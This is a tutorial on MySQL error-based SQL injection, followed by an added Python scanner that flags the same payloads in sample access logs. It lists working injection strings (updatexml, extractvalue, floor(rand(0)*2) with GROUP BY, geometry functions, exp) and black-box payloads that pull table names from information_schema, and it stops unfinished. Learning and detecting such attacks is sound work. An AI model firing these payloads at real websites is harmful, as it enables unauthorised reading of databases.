1. Enter ' and check whether the page returns an error; if it does, error-based injection is present.
2. Enter 1'and info()#; the error page will then display the database name (info() is not a MySQL function, and MySQL reports the unknown function qualified with the current database name, as dbname.info).
3. Obtain the database user name
Enter 1'and (updatexml(1,concat(0x7e,(select user()),0x7e),1))--+
You can replace user() with version() or database() to retrieve other information.
However, the updatexml error function only displays 32 characters of content; if the retrieved content is longer than 32 characters, you have to use string-slicing functions, fetching 32 characters at a time.
Besides updatexml, MySQL has many other functions that support error-based injection:
1. floor(): select * from test where id=1 and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a);
2. extractvalue(): select * from test where id=1 and (extractvalue(1,concat(0x7e,(select user()),0x7e)));
3. updatexml(): select * from test where id=1 and (updatexml(1,concat(0x7e,(select user()),0x7e),1));
4. geometrycollection(): select * from test where id=1 and geometrycollection((select * from(select * from(select user())a)b));
5. multipoint(): select * from test where id=1 and multipoint((select * from(select * from(select user())a)b));
6. polygon(): select * from test where id=1 and polygon((select * from(select * from(select user())a)b));
7. multipolygon(): select * from test where id=1 and multipolygon((select * from(select * from(select user())a)b));
8. linestring(): select * from test where id=1 and linestring((select * from(select * from(select user())a)b));
9. multilinestring(): select * from test where id=1 and multilinestring((select * from(select * from(select user())a)b));
10. exp(): select * from test where id=1 and exp(~(select * from(select user())a));
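From the defender's side, every primitive listed above leaves a recognisable token in the request (updatexml/extractvalue, floor(rand(0)*2) with GROUP BY, a geometry function wrapping a subquery, exp(~...), or the unknown-function probe from step 2). The following added example, which is not part of the original page, scans constructed access-log lines in combined log format and tags each request with the error-based injection signature it matches; the log lines, IP addresses and paths are made up for the demonstration.

```python
import re
from urllib.parse import unquote_plus

# Signatures for the MySQL error-based primitives described in the text.
# They are applied to the URL-decoded query string, case-insensitively.
SIGNATURES = {
    "xpath_error": re.compile(r"\b(updatexml|extractvalue)\s*\(", re.I),
    "floor_groupby": re.compile(r"floor\s*\(\s*rand\s*\(\s*0?\s*\)\s*\*\s*2\s*\).*group\s+by", re.I | re.S),
    "geometry_error": re.compile(r"\b(geometrycollection|multipoint|polygon|multipolygon|linestring"
                                 r"|multilinestring)\s*\(\s*\(?\s*select\b", re.I),
    "exp_overflow": re.compile(r"\bexp\s*\(\s*~", re.I),
    "function_probe": re.compile(r"'\s*and\s+\w+\s*\(\s*\)\s*#", re.I),  # e.g. 1'and info()#
}

# Combined log format: ip ident user [time] "METHOD path?qs HTTP/x" status size
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) '
                    r'(?P<path>[^?\s]+)(?:\?(?P<qs>\S*))? [^"]+" (?P<status>\d{3})')

# Constructed sample log: four probes and two benign requests.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Oct/2023:13:55:36 +0000] "GET /item.php?id=1 HTTP/1.1" 200 512
203.0.113.7 - - [10/Oct/2023:13:55:40 +0000] "GET /item.php?id=1'and+info()%23 HTTP/1.1" 500 180
203.0.113.7 - - [10/Oct/2023:13:55:44 +0000] "GET /item.php?id=1'and+(updatexml(1,concat(0x7e,(select+user()),0x7e),1))--+ HTTP/1.1" 500 220
198.51.100.9 - - [10/Oct/2023:13:56:01 +0000] "GET /item.php?id=1+and+(select+1+from(select+count(*),concat(user(),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a) HTTP/1.1" 500 240
198.51.100.9 - - [10/Oct/2023:13:56:05 +0000] "GET /item.php?id=1+and+exp(~(select+*+from(select+user())a)) HTTP/1.1" 500 200
192.0.2.3 - - [10/Oct/2023:13:56:10 +0000] "GET /search.php?q=polygon+shaped+tables HTTP/1.1" 200 900
"""


def classify_request(query_string):
    """Return the set of signature names that match one raw query string."""
    decoded = unquote_plus(query_string)  # '+' -> space, %23 -> '#', etc.
    return {name for name, rx in SIGNATURES.items() if rx.search(decoded)}


def scan_access_log(lines):
    """Return (ip, path, status, sorted signature names) for each matching request."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # unparsable line; a real pipeline would count these
        matches = classify_request(m.group("qs") or "")
        if matches:
            hits.append((m.group("ip"), m.group("path"), int(m.group("status")), sorted(matches)))
    return hits


if __name__ == "__main__":
    for ip, path, status, names in scan_access_log(SAMPLE_LOG.splitlines()):
        print(f"{ip} {path} HTTP {status}: {', '.join(names)}")
```

A 500 status paired with one of these signatures is the strongest indicator, because the technique only works when the database error text reaches the response; the benign "polygon shaped tables" search is not flagged because the geometry signature requires a subquery inside the function call.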
Black-box injection
First use 1'and info()# to obtain the database name.
Then enter 1'and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,table_name,0x7e) FROM information_schema.tables where table_schema=database() LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)# to obtain the table names.
The rest is still to be completed.